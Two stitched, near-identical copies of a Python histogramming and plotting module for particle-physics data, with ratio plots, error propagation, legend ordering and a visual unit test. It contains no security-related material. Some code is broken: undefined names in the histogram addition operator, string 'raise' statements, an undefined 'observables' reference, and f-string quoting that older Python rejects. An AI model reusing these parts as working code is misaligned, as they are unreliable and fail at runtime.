ticks = tick_calc(lim=ylim_ratio, step=ytick_ratio_step)
ticks = ticks[1:-1] # Remove the first and the last
set_axis_ticks(ax[1], ticks, 'y')
# Tick settings
for a in ax:
if minorticks_on: a.minorticks_on()
a.tick_params(top=True, bottom=True, right=True, left=True, which='both', direction='in', labelsize=labelsize)
return ax
def create_axes(xlabel='$x$', ylabel=r'Counts', ylabel_ratio='Ratio',
xlim=(0,1), ylim=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, figsize=(5,4), fontsize=9, units={'x': '', 'y': ''}, **kwargs):
""" Axes creator.
"""
# Create subplots
N = 2 if ratio_plot else 1
gridspec_kw = {'height_ratios': (3.333, 1) if ratio_plot else (1,), 'hspace': 0.0}
fig, ax = plt.subplots(N, figsize=figsize, gridspec_kw=gridspec_kw)
ax = [ax] if (N == 1) else ax
# Axes limits
for a in ax:
if xlim is not None:
a.set_xlim(*xlim)
if ylim is not None:
ax[0].set_ylim(*ylim)
# Axes labels
if kwargs['density']:
ylabel = f'$1/N$ {ylabel} / [{units['x']}]'
else:
ylabel = f'{ylabel} [{units['y']} / {units['x']}]'
xlabel = f'{xlabel} [{units['x']}]'
ax[0].set_ylabel(ylabel, fontsize=fontsize)
ax[-1].set_xlabel(xlabel, fontsize=fontsize)
# Ratio plot
if ratio_plot:
ax[1].set_ylabel(ylabel_ratio, fontsize=fontsize)
ax[1].set_ylim(*ylim_ratio)
# Setup ticks
ax = tick_creator(ax=ax, ratio_plot=ratio_plot, **kwargs)
return fig, ax
def ordered_legend(ax=None, order=None, frameon=False, unique=False, **kwargs):
""" Ordered legends.
"""
def unique_everseen(seq, key=None):
seen = set()
seen_add = seen.add
return [x for x,k in zip(seq,key) if not (k in seen or seen_add(k))]
if ax is None: ax=plt.gca()
handles, labels = ax.get_legend_handles_labels()
# Sort both labels and handles by labels
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
# Sort according to a given list, which may be incomplete
if order is not None:
keys=dict(zip(order,range(len(order))))
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t, keys=keys: keys.get(t[0],np.inf)))
# Keep only the first of each handle
if unique: labels, handles= zip(*unique_everseen(zip(labels,handles), key = labels))
ax.legend(handles, labels, frameon=frameon, **kwargs)
return (handles, labels)
def binwidth(bins):
""" Return binwidth from a linear array """
return (bins[1:] - bins[0:-1])
def edge2centerbins(bins) :
""" Get centerbins from edgebins.
"""
return (bins[1:] + bins[0:-1])/2
def ratioerr(A, B, sigma_A, sigma_B, sigma_AB = 0, EPS = 1E-15):
""" Ratio f(A,B) = A/B error, by Taylor expansion of f.
"""
A[np.abs(A) < EPS] = EPS
B[np.abs(B) < EPS] = EPS
return np.abs(A/B) * np.sqrt((sigma_A/A)**2 + (sigma_B/B)**2 - 2*sigma_AB/(A*B))
def hist_to_density(counts, errs, bins):
""" Normalize to unit integral density function over the visible histogram range """
norm = binwidth(bins) * counts.sum()
return counts/norm, errs/norm
def hist_to_density_fullspace(counts, errs, bins, totalweight):
""" Normalize histogram to a unit integral density function
over total sum of event weights (not just the visible histogram range mass)
"""
norm = binwidth(bins) * totalweight
return counts/norm, errs/norm
def hist(x, bins=30, density=False, weights=None):
""" Calculate a histogram.
"""
x = np.asarray(x, dtype=np.float64)
# Calculate histogram
if weights is None:
weights = np.ones(x.shape)
weights = np.array(weights)
counts, bins = np.histogram(x, bins=bins, weights=weights)
cbins = edge2centerbins(bins)
# Input data to histogram bins
# Weighted error on bin counts given by (square root of) sum of squared weights
inds = np.digitize(x, bins)
errs = np.asarray([np.linalg.norm(weights[inds==k],2) for k in range(1, len(bins))])
# Density integral 1 over the histogram bins range
if density:
counts, errs = hist_to_density(counts=counts, errs=errs, bins=bins)
return counts, errs, bins, cbins
def hist_obj(x, bins=30, weights=None):
""" A wrapper to return a histogram object.
"""
counts, errs, bins, cbins = hist(x, bins=bins, weights=weights)
return hobj(counts, errs, bins, cbins)
def generate_colormap():
""" Default colormap.
"""
# Take colors
color = plt.cm.Set1(np.linspace(0,1,10))
# Add black
black = np.ones((1,4))
black[:,0:3] = 0.0
color = np.concatenate((black, color))
return color
def hist_filled_error(ax, bins, cbins, y, err, color, **kwargs):
""" Stephist style error.
"""
new_args = kwargs.copy()
new_args['lw'] = 0
new_args.pop('histtype', None) # Remove
ax.fill_between(bins[0:-1], y-err, y+err, step='post', alpha=0.3, color=color, **new_args)
# The last bin
ax.fill_between(bins[-2:], (y-err)[-2:], (y+err)[-2:], step='pre', alpha=0.3, color=color, **new_args)
def superplot(data, observable=None, ratio_plot=True, yscale='linear', ratio_error_plot=True, \
legend_counts=False, color=None, legend_properties={'fontsize': 9}, bottom_PRC=5, EPS=1E-12):
""" Superposition (overlaid) plotting
"""
if observable == None:
observable = data[0]['obs']
fig, ax = create_axes(**observable, ratio_plot=ratio_plot)
if color == None:
color = generate_colormap()
legend_labels = []
# y-axis limit
bottom_count = 1e32
ceiling_count = 0
# Plot histograms
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i}')
continue
c = data[i]['color']
if c is None: c = color[i]
counts = data[i]['hdata'].counts * data[i]['hdata'].binscale
errs = data[i]['hdata'].errs * data[i]['hdata'].binscale
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# -----------------------------------------------
# ** For visualization autolimits **
# Use percentile for the bottom (~ handle noisy small bins)
bottom_count = np.min([bottom_count, np.percentile(counts[counts > EPS], bottom_PRC)])
ceiling_count = np.max([ceiling_count, np.max(counts[counts > 0])])
# -----------------------------------------------
label = data[i]['label']
if legend_counts == True:
label += f' $N={np.sum(data[i]['hdata'].counts):.1f}$'
legend_labels.append(label)
if data[i]['hfunc'] == 'hist' :
ax[0].hist(x=cbins, bins=bins, weights=counts, color=c, label=label, **data[i]['style'])
hist_filled_error(ax=ax[0], bins=bins, cbins=cbins, y=counts, err=errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar' :
ax[0].errorbar(x=cbins, y=counts, yerr=errs, color=c, label=label, **data[i]['style'])
elif data[i]['hfunc'] == 'plot' :
ax[0].plot(cbins, counts, color=c, label=label, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[0].fill_between(cbins, counts-errs, counts+errs, alpha=0.3, color=c, **new_args)
# Plot ratiohistograms
if ratio_plot:
plot_horizontal_line(ax[1])
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i} (ratioplot)')
continue
c = data[i]['color']
if c is None: c = color[i]
A = data[i]['hdata'].counts * data[i]['hdata'].binscale
B = data[0]['hdata'].counts * data[0]['hdata'].binscale
sigma_A = data[i]['hdata'].errs * data[i]['hdata'].binscale
sigma_B = data[0]['hdata'].errs * data[0]['hdata'].binscale
sigma_AB = 0
ratio_errs = ratioerr(A=A, B=B, sigma_A=sigma_A, sigma_B=sigma_B, sigma_AB=sigma_AB)
EPS = 1E-30
ratio = A / (B + EPS)
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# If no errors turned on
if ratio_error_plot == False:
ratio_errs = np.zeros(ratio_errs.shape)
if data[i]['hfunc'] == 'hist':
ax[1].hist(x=cbins, bins=bins, weights=ratio, color=c, **data[i]['style'])
hist_filled_error(ax=ax[1], bins=bins, cbins=cbins, y=ratio, err=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar':
ax[1].errorbar(x=cbins, y=ratio, yerr=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'plot':
ax[1].plot(cbins, ratio, color=c, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[1].fill_between(cbins, ratio-ratio_errs, ratio+ratio_errs, alpha=0.3, color=c, **new_args)
# Legend
if legend_labels != []:
ordered_legend(ax = ax[0], order=legend_labels, **legend_properties)
# --------------------------------------------------------------------
# Upper figure
# Log y-scale
ax[0].set_yscale(yscale)
# y-limits
if observable['ylim'] is None:
ylim_now = ax[0].get_ylim()
if yscale == 'log':
ax[0].set_ylim([bottom_count / 4, ceiling_count * 10])
else:
ax[0].set_ylim([0, ceiling_count * 1.5])
else:
ax[0].set_ylim(observables.ylim)
# --------------------------------------------------------------------
return fig, ax
def change2density_labels(all_obs):
""" Change to density ~ 1/N dN/dx [1/xdim] type label to y-axis """
for key in all_obs.keys():
xlabel = all_obs[key]['xlabel'].replace('$', '')
all_obs[key]['ylabel'] = '$\\frac{1}{N} \\; ' + f'dN/d{xlabel}$'
all_obs[key]['units']['y'] = '1'
return all_obs
def histmc(mcdata, all_obs, density=False, scale=None, color=(0,0,1), label='none', style=hist_style_step):
""" Over all observables of an MC sample """
obj = {}
for OBS in all_obs.keys():
# Histogram it
counts, errs, bins, cbins = hist(x=mcdata['data'][OBS], bins=all_obs[OBS]['bins'], weights=mcdata['weights'])
# Compute differential cross section within histogram range
# Note that division by sum(weights) handles the histogram range integral (overflow) properly
binscale = mcdata['xsection_pb'] / binwidth(bins) / np.sum(mcdata['weights'])
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
counts,errs = hist_to_density(counts=counts, errs=errs, bins=bins)
binscale = 1.0
obj[OBS] = {'hdata': hobj(counts, errs, bins, cbins, binscale), 'hfunc' : 'hist', 'color': color, 'label': label, 'style' : style}
return obj
def histhepdata(hepdata, all_obs, scale=None, density=False, MC_XS_SCALE=1E12, label='Data', style=hist_style_step):
# Over all observables
obj = {}
for OBS in all_obs.keys():
# Over all DATA files (now fixed to one)
data_obj = []
y = hepdata[OBS]['y']
yerr = hepdata[OBS]['y_err']
bins = hepdata[OBS]['bins']
cbins = hepdata[OBS]['x']
binscale = hepdata[OBS]['scale'] * MC_XS_SCALE
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
norm = hepdata[OBS]['binwidth'] * y.sum()
y /= norm
yerr /= norm
binscale = 1.0
obj[OBS] = {'hdata': hobj(y, yerr, bins, cbins, binscale), 'hfunc' : 'hist', 'color': (0,0,0), 'label': label, 'style' : style}
return obj
def fuse_histograms(hist_list):
"""
Fuse a list of count histogram objects
"""
hsum = copy.deepcopy(hist_list[0])
for c in range(1, len(hist_list)):
for OBS in hist_list[0].keys():
hsum[OBS]['hdata'] += hist_list[c][OBS]['hdata']
return hsum
def test_iceplot():
""" Visual unit tests """
import pytest
import pathlib
pathlib.Path("./testfigs").mkdir(parents=True, exist_ok=True)
# ------------------------------------------------------------------------
set_global_style()
# Synthetic input data
r1 = np.random.randn(25000) * 0.8
r2 = np.random.randn(25000) * 1
r3 = np.random.randn(25000) * 1.2
r4 = np.random.randn(25000) * 1.5
# ------------------------------------------------------------------------
# Mathematical definitions
# Momentum squared
def pt2(x):
return np.power(x,2);
# ------------------------------------------------------------------------
# Observables containers
obs_pt2 = {
# Axis limits
'xlim' : (0, 1.5),
'ylim' : None,
'xlabel' : r'$p_t^2$',
'ylabel' : r'Counts',
'units' : {'x': r'GeV$^2$', 'y' : r'counts'},
'label' : r'Transverse momentum squared',
'figsize' : (4, 3.75),
# Ratio
'ylim_ratio' : (0.7, 1.3),
# Histogramming
'bins' : np.linspace(0, 1.5, 60),
'density' : False,
# Function to calculate
'func' : pt2
}
# ------------------------------------------------------------------------
# ** Example **
fig1, ax1 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax1[0].errorbar(x=cbins, y=counts, yerr=errs, color=(0,0,0), label='Data $\\alpha$', **errorbar_style)
ax1[0].legend(frameon=False)
fig1.savefig('./testfigs/testplot_1.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig2, ax2 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax2[0].hist(x=cbins, bins=bins, weights=counts, color=(0.5, 0.2, 0.1), label='Data $\\alpha$', **hist_style_step)
ax2[0].legend(frameon=False)
fig2.savefig('./testfigs/testplot_2.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig3, ax3 = create_axes(**obs_pt2, ratio_plot=True)
counts1, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts1, color=(0,0,0), label='Data 1', **hist_style_step)
counts2, errs, bins, cbins = hist(obs_pt2['func'](r2), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts2, color=(1,0,0), alpha=0.5, label='Data 2', **hist_style_step)
ordered_legend(ax = ax3[0], order=['Data 1', 'Data 2'])
# Ratio
plot_horizontal_line(ax3[1])
ax3[1].hist(x=cbins, bins=bins, weights=counts2 / (counts1 + 1E-30), color=(1,0,0), alpha=0.5, label='Data $\\beta$', **hist_style_step)
fig3.savefig('./testfigs/testplot_3.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
data_template = {
'data' : None,
'weights': None,
'label' : 'Data',
'hfunc' : 'errorbar',
'style' : errorbar_style,
'obs' : obs_pt2,
'hdata' : None,
'color' : None
}
# Data source <-> Observable collections
data1 = data_template.copy() # Deep copies
data2 = data_template.copy()
data3 = data_template.copy()
data4 = data_template.copy()
data1.update({
'data' : r1,
'label' : 'Data $\\alpha$',
'hfunc' : 'errorbar',
'style' : errorbar_style,
})
data2.update({
'data' : r2,
'label' : 'Data $\\beta$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data3.update({
'data' : r3,
'label' : 'Data $\\gamma$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data4.update({
'data' : r4,
'label' : 'Data $\\delta$',
'hfunc' : 'plot',
'style' : plot_style,
})
data = [data1, data2, data3, data4]
# Calculate histograms
for i in range(len(data)):
data[i]['hdata'] = hist_obj(data[i]['obs']['func'](data[i]['data']), bins=data[i]['obs']['bins'])
# Plot it
fig4, ax4 = superplot(data, ratio_plot=True, yscale='log')
fig5, ax5 = superplot(data, ratio_plot=True, yscale='linear', ratio_error_plot=False)
fig4.savefig('./testfigs/testplot_4.pdf', bbox_inches='tight')
fig5.savefig('./testfigs/testplot_5.pdf', bbox_inches='tight')
| # Advanced histogramming & automated plotting functions
#
# (c) 2021 Mikael Mieskolainen
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
import pathlib
import matplotlib
matplotlib.use('Agg') # Important for multithreaded applications
from matplotlib import pyplot as plt
import numpy as np
import math
import copy
def chi2_cost(h_mc, h_data):
"""
Chi2 cost function between two histograms
"""
counts_mc = h_mc.counts * h_mc.binscale
err_mc = h_mc.errs * h_mc.binscale
counts_data = h_data.counts * h_data.binscale
err_data = h_data.errs * h_data.binscale
return np.sum((counts_mc - counts_data)**2 / (err_mc**2 + err_data**2))
def set_global_style(dpi=120, figsize=(4,3.75), font='serif', font_size=8, legend_fontsize=7, legend_handlelength=1):
""" Set global plot style.
"""
plt.rcParams['legend.fontsize'] = legend_fontsize
plt.rcParams['legend.handlelength'] = legend_handlelength
plt.rcParams['figure.dpi'] = dpi
plt.rcParams['figure.figsize'] = figsize
plt.rcParams['font.family'] = font
plt.rcParams['font.size'] = font_size
# Colors
imperial_dark_blue = (0, 0.24, 0.45)
imperial_light_blue = (0, 0.43, 0.69)
imperial_dark_red = (0.75, 0.10, 0.0)
imperial_green = (0.0, 0.54, 0.23)
def colors(i, power=0.34):
c = [imperial_dark_red, imperial_dark_blue, imperial_green, imperial_light_blue]
if i < len(c):
return c[i]
else:
return c[i%len(c)] * (1.0/power)
""" Global marker styles
zorder : approximate plotting order
lw : linewidth
ls : linestyle
"""
errorbar_style = {'zorder': 3, 'ls': ' ', 'lw': 1, 'marker': 'o', 'markersize': 2.5}
plot_style = {'zorder': 2, 'ls': '-', 'lw': 1}
hist_style_step = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'step'}
hist_style_fill = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'stepfilled'}
hist_style_bar = {'zorder': 0, 'ls': '-', 'lw': 1, 'histtype': 'bar'}
class hobj:
""" Minimal histogram data object.
"""
def __init__(self, counts = 0, errs = 0, bins = 0, cbins = 0, binscale=1.0):
self.counts = counts
self.errs = errs
self.bins = bins
self.cbins = cbins
self.binscale = binscale
if (np.sum(counts) == 0):
self.is_empty = True
else:
self.is_empty = False
# + operator
def __add__(self, other):
if (self.is_empty == True): # Take the rhs
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' + operator: cannot operate on different sized histograms')
# Harmonic sum
binscale = 1/(1/self.binscale + 1/other.binscale)
counts = self.counts + other.counts
errs = np.sqrt(self.errs**2 + other.errs**2)
return hobj(counts, errs, bins, cbins, binscale)
# += operator
def __iadd__(self, other):
if (self.is_empty == True): # Still empty
return other
if ((self.bins == other.bins).all() == False):
raise(__name__ + ' += operator: cannot operate on different sized histograms')
self.counts = self.counts + other.counts
self.errs = np.sqrt(self.errs**2 + other.errs**2)
# Harmonic sum
self.binscale = 1/(1/self.binscale + 1/other.binscale)
return self
def stepspace(start, stop, step):
""" Linear binning edges between [start, stop]
"""
return np.arange(start, stop + step, step)
def plot_horizontal_line(ax, color=(0.5,0.5,0.5), linewidth=0.9):
""" For the ratio plot
"""
xlim = ax.get_xlim()
ax.plot(np.linspace(xlim[0], xlim[1], 2), np.array([1,1]), color=color, linewidth=linewidth)
def tick_calc(lim, step, N=6):
""" Tick spacing calculator.
"""
return [np.round(lim[0] + i*step, N) for i in range(1 + math.floor((lim[1] - lim[0])/step))]
def set_axis_ticks(ax, ticks, dim='x'):
""" Set ticks of the axis.
"""
if (dim == 'x'):
ax.set_xticks(ticks)
ax.set_xticklabels(list(map(str, ticks)))
elif (dim == 'y'):
ax.set_yticks(ticks)
ax.set_yticklabels(list(map(str, ticks)))
def tick_creator(ax, xtick_step=None, ytick_step=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, minorticks_on=True, ytick_ratio_step=0.15, labelsize=9,
labelsize_ratio=8, **kwargs) :
""" Axis tick constructor.
"""
# Get limits
xlim = ax[0].get_xlim()
ylim = ax[0].get_ylim()
# X-axis
if (xtick_step is not None):
ticks = tick_calc(lim=xlim, step=xtick_step)
set_axis_ticks(ax[-1], ticks, 'x')
# Y-axis
if (ytick_step is not None):
ticks = tick_calc(lim=ylim, step=ytick_step)
set_axis_ticks(ax[0], ticks, 'y')
# Y-ratio-axis
if ratio_plot:
ax[0].tick_params(labelbottom=False)
ax[1].tick_params(axis='y', labelsize=labelsize_ratio)
ticks = tick_calc(lim=ylim_ratio, step=ytick_ratio_step)
ticks = ticks[1:-1] # Remove the first and the last
set_axis_ticks(ax[1], ticks, 'y')
# Tick settings
for a in ax:
if minorticks_on: a.minorticks_on()
a.tick_params(top=True, bottom=True, right=True, left=True, which='both', direction='in', labelsize=labelsize)
return ax
def create_axes(xlabel='$x$', ylabel=r'Counts', ylabel_ratio='Ratio',
xlim=(0,1), ylim=None, ylim_ratio=(0.7, 1.3),
ratio_plot=True, figsize=(5,4), fontsize=9, units={'x': '', 'y': ''}, **kwargs):
""" Axes creator.
"""
# Create subplots
N = 2 if ratio_plot else 1
gridspec_kw = {'height_ratios': (3.333, 1) if ratio_plot else (1,), 'hspace': 0.0}
fig, ax = plt.subplots(N, figsize=figsize, gridspec_kw=gridspec_kw)
ax = [ax] if (N == 1) else ax
# Axes limits
for a in ax:
if xlim is not None:
a.set_xlim(*xlim)
if ylim is not None:
ax[0].set_ylim(*ylim)
# Axes labels
if kwargs['density']:
ylabel = f'$1/N$ {ylabel} / [{units["x"]}]'
else:
ylabel = f'{ylabel} [{units["y"]} / {units["x"]}]'
xlabel = f'{xlabel} [{units["x"]}]'
ax[0].set_ylabel(ylabel, fontsize=fontsize)
ax[-1].set_xlabel(xlabel, fontsize=fontsize)
# Ratio plot
if ratio_plot:
ax[1].set_ylabel(ylabel_ratio, fontsize=fontsize)
ax[1].set_ylim(*ylim_ratio)
# Setup ticks
ax = tick_creator(ax=ax, ratio_plot=ratio_plot, **kwargs)
return fig, ax
def ordered_legend(ax=None, order=None, frameon=False, unique=False, **kwargs):
""" Ordered legends.
"""
def unique_everseen(seq, key=None):
seen = set()
seen_add = seen.add
return [x for x,k in zip(seq,key) if not (k in seen or seen_add(k))]
if ax is None: ax=plt.gca()
handles, labels = ax.get_legend_handles_labels()
# Sort both labels and handles by labels
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
# Sort according to a given list, which may be incomplete
if order is not None:
keys=dict(zip(order,range(len(order))))
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t, keys=keys: keys.get(t[0],np.inf)))
# Keep only the first of each handle
if unique: labels, handles= zip(*unique_everseen(zip(labels,handles), key = labels))
ax.legend(handles, labels, frameon=frameon, **kwargs)
return (handles, labels)
def binwidth(bins):
""" Return binwidth from a linear array """
return (bins[1:] - bins[0:-1])
def edge2centerbins(bins) :
""" Get centerbins from edgebins.
"""
return (bins[1:] + bins[0:-1])/2
def ratioerr(A, B, sigma_A, sigma_B, sigma_AB = 0, EPS = 1E-15):
""" Ratio f(A,B) = A/B error, by Taylor expansion of f.
"""
A[np.abs(A) < EPS] = EPS
B[np.abs(B) < EPS] = EPS
return np.abs(A/B) * np.sqrt((sigma_A/A)**2 + (sigma_B/B)**2 - 2*sigma_AB/(A*B))
def hist_to_density(counts, errs, bins):
""" Normalize to unit integral density function over the visible histogram range """
norm = binwidth(bins) * counts.sum()
return counts/norm, errs/norm
def hist_to_density_fullspace(counts, errs, bins, totalweight):
""" Normalize histogram to a unit integral density function
over total sum of event weights (not just the visible histogram range mass)
"""
norm = binwidth(bins) * totalweight
return counts/norm, errs/norm
def hist(x, bins=30, density=False, weights=None):
""" Calculate a histogram.
"""
x = np.asarray(x, dtype=np.float64)
# Calculate histogram
if weights is None:
weights = np.ones(x.shape)
weights = np.array(weights)
counts, bins = np.histogram(x, bins=bins, weights=weights)
cbins = edge2centerbins(bins)
# Input data to histogram bins
# Weighted error on bin counts given by (square root of) sum of squared weights
inds = np.digitize(x, bins)
errs = np.asarray([np.linalg.norm(weights[inds==k],2) for k in range(1, len(bins))])
# Density integral 1 over the histogram bins range
if density:
counts, errs = hist_to_density(counts=counts, errs=errs, bins=bins)
return counts, errs, bins, cbins
def hist_obj(x, bins=30, weights=None):
""" A wrapper to return a histogram object.
"""
counts, errs, bins, cbins = hist(x, bins=bins, weights=weights)
return hobj(counts, errs, bins, cbins)
def generate_colormap():
""" Default colormap.
"""
# Take colors
color = plt.cm.Set1(np.linspace(0,1,10))
# Add black
black = np.ones((1,4))
black[:,0:3] = 0.0
color = np.concatenate((black, color))
return color
def hist_filled_error(ax, bins, cbins, y, err, color, **kwargs):
""" Stephist style error.
"""
new_args = kwargs.copy()
new_args['lw'] = 0
new_args.pop('histtype', None) # Remove
ax.fill_between(bins[0:-1], y-err, y+err, step='post', alpha=0.3, color=color, **new_args)
# The last bin
ax.fill_between(bins[-2:], (y-err)[-2:], (y+err)[-2:], step='pre', alpha=0.3, color=color, **new_args)
def superplot(data, observable=None, ratio_plot=True, yscale='linear', ratio_error_plot=True, \
legend_counts=False, color=None, legend_properties={'fontsize': 9}, bottom_PRC=5, EPS=1E-12):
""" Superposition (overlaid) plotting
"""
if observable == None:
observable = data[0]['obs']
fig, ax = create_axes(**observable, ratio_plot=ratio_plot)
if color == None:
color = generate_colormap()
legend_labels = []
# y-axis limit
bottom_count = 1e32
ceiling_count = 0
# Plot histograms
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i}')
continue
c = data[i]['color']
if c is None: c = color[i]
counts = data[i]['hdata'].counts * data[i]['hdata'].binscale
errs = data[i]['hdata'].errs * data[i]['hdata'].binscale
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# -----------------------------------------------
# ** For visualization autolimits **
# Use percentile for the bottom (~ handle noisy small bins)
bottom_count = np.min([bottom_count, np.percentile(counts[counts > EPS], bottom_PRC)])
ceiling_count = np.max([ceiling_count, np.max(counts[counts > 0])])
# -----------------------------------------------
label = data[i]['label']
if legend_counts == True:
label += f' $N={np.sum(data[i]["hdata"].counts):.1f}$'
legend_labels.append(label)
if data[i]['hfunc'] == 'hist' :
ax[0].hist(x=cbins, bins=bins, weights=counts, color=c, label=label, **data[i]['style'])
hist_filled_error(ax=ax[0], bins=bins, cbins=cbins, y=counts, err=errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar' :
ax[0].errorbar(x=cbins, y=counts, yerr=errs, color=c, label=label, **data[i]['style'])
elif data[i]['hfunc'] == 'plot' :
ax[0].plot(cbins, counts, color=c, label=label, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[0].fill_between(cbins, counts-errs, counts+errs, alpha=0.3, color=c, **new_args)
# Plot ratiohistograms
if ratio_plot:
plot_horizontal_line(ax[1])
for i in range(len(data)):
if data[i]['hdata'].is_empty:
print(__name__ + f'.superplot: Skipping empty histogram for entry {i} (ratioplot)')
continue
c = data[i]['color']
if c is None: c = color[i]
A = data[i]['hdata'].counts * data[i]['hdata'].binscale
B = data[0]['hdata'].counts * data[0]['hdata'].binscale
sigma_A = data[i]['hdata'].errs * data[i]['hdata'].binscale
sigma_B = data[0]['hdata'].errs * data[0]['hdata'].binscale
sigma_AB = 0
ratio_errs = ratioerr(A=A, B=B, sigma_A=sigma_A, sigma_B=sigma_B, sigma_AB=sigma_AB)
EPS = 1E-30
ratio = A / (B + EPS)
bins = data[i]['hdata'].bins
cbins = data[i]['hdata'].cbins
# If no errors turned on
if ratio_error_plot == False:
ratio_errs = np.zeros(ratio_errs.shape)
if data[i]['hfunc'] == 'hist':
ax[1].hist(x=cbins, bins=bins, weights=ratio, color=c, **data[i]['style'])
hist_filled_error(ax=ax[1], bins=bins, cbins=cbins, y=ratio, err=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'errorbar':
ax[1].errorbar(x=cbins, y=ratio, yerr=ratio_errs, color=c, **data[i]['style'])
elif data[i]['hfunc'] == 'plot':
ax[1].plot(cbins, ratio, color=c, **data[i]['style'])
new_args = data[i]['style'].copy()
new_args['lw'] = 0
ax[1].fill_between(cbins, ratio-ratio_errs, ratio+ratio_errs, alpha=0.3, color=c, **new_args)
# Legend
if legend_labels != []:
ordered_legend(ax = ax[0], order=legend_labels, **legend_properties)
# --------------------------------------------------------------------
# Upper figure
# Log y-scale
ax[0].set_yscale(yscale)
# y-limits
if observable['ylim'] is None:
ylim_now = ax[0].get_ylim()
if yscale == 'log':
ax[0].set_ylim([bottom_count / 4, ceiling_count * 10])
else:
ax[0].set_ylim([0, ceiling_count * 1.5])
else:
ax[0].set_ylim(observables.ylim)
# --------------------------------------------------------------------
return fig, ax
def change2density_labels(all_obs):
""" Change to density ~ 1/N dN/dx [1/xdim] type label to y-axis """
for key in all_obs.keys():
xlabel = all_obs[key]['xlabel'].replace('$', '')
all_obs[key]['ylabel'] = '$\\frac{1}{N} \\; ' + f'dN/d{xlabel}$'
all_obs[key]['units']['y'] = '1'
return all_obs
def histmc(mcdata, all_obs, density=False, scale=None, color=(0,0,1), label='none', style=hist_style_step):
""" Over all observables of an MC sample """
obj = {}
for OBS in all_obs.keys():
# Histogram it
counts, errs, bins, cbins = hist(x=mcdata['data'][OBS], bins=all_obs[OBS]['bins'], weights=mcdata['weights'])
# Compute differential cross section within histogram range
# Note that division by sum(weights) handles the histogram range integral (overflow) properly
binscale = mcdata['xsection_pb'] / binwidth(bins) / np.sum(mcdata['weights'])
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
counts,errs = hist_to_density(counts=counts, errs=errs, bins=bins)
binscale = 1.0
obj[OBS] = {'hdata': hobj(counts, errs, bins, cbins, binscale), 'hfunc' : 'hist', 'color': color, 'label': label, 'style' : style}
return obj
def histhepdata(hepdata, all_obs, scale=None, density=False, MC_XS_SCALE=1E12, label='Data', style=hist_style_step):
# Over all observables
obj = {}
for OBS in all_obs.keys():
# Over all DATA files (now fixed to one)
data_obj = []
y = hepdata[OBS]['y']
yerr = hepdata[OBS]['y_err']
bins = hepdata[OBS]['bins']
cbins = hepdata[OBS]['x']
binscale = hepdata[OBS]['scale'] * MC_XS_SCALE
# Additional scale factor
if scale is not None:
binscale *= scale
# Density integral 1 over the histogram bins
if density:
norm = hepdata[OBS]['binwidth'] * y.sum()
y /= norm
yerr /= norm
binscale = 1.0
obj[OBS] = {'hdata': hobj(y, yerr, bins, cbins, binscale), 'hfunc' : 'hist', 'color': (0,0,0), 'label': label, 'style' : style}
return obj
def fuse_histograms(hist_list):
"""
Fuse a list of count histogram objects
"""
hsum = copy.deepcopy(hist_list[0])
for c in range(1, len(hist_list)):
for OBS in hist_list[0].keys():
hsum[OBS]['hdata'] += hist_list[c][OBS]['hdata']
return hsum
def test_iceplot():
""" Visual unit tests """
import pytest
import pathlib
pathlib.Path("./testfigs").mkdir(parents=True, exist_ok=True)
# ------------------------------------------------------------------------
set_global_style()
# Synthetic input data
r1 = np.random.randn(25000) * 0.8
r2 = np.random.randn(25000) * 1
r3 = np.random.randn(25000) * 1.2
r4 = np.random.randn(25000) * 1.5
# ------------------------------------------------------------------------
# Mathematical definitions
# Momentum squared
def pt2(x):
return np.power(x,2);
# ------------------------------------------------------------------------
# Observables containers
obs_pt2 = {
# Axis limits
'xlim' : (0, 1.5),
'ylim' : None,
'xlabel' : r'$p_t^2$',
'ylabel' : r'Counts',
'units' : {'x': r'GeV$^2$', 'y' : r'counts'},
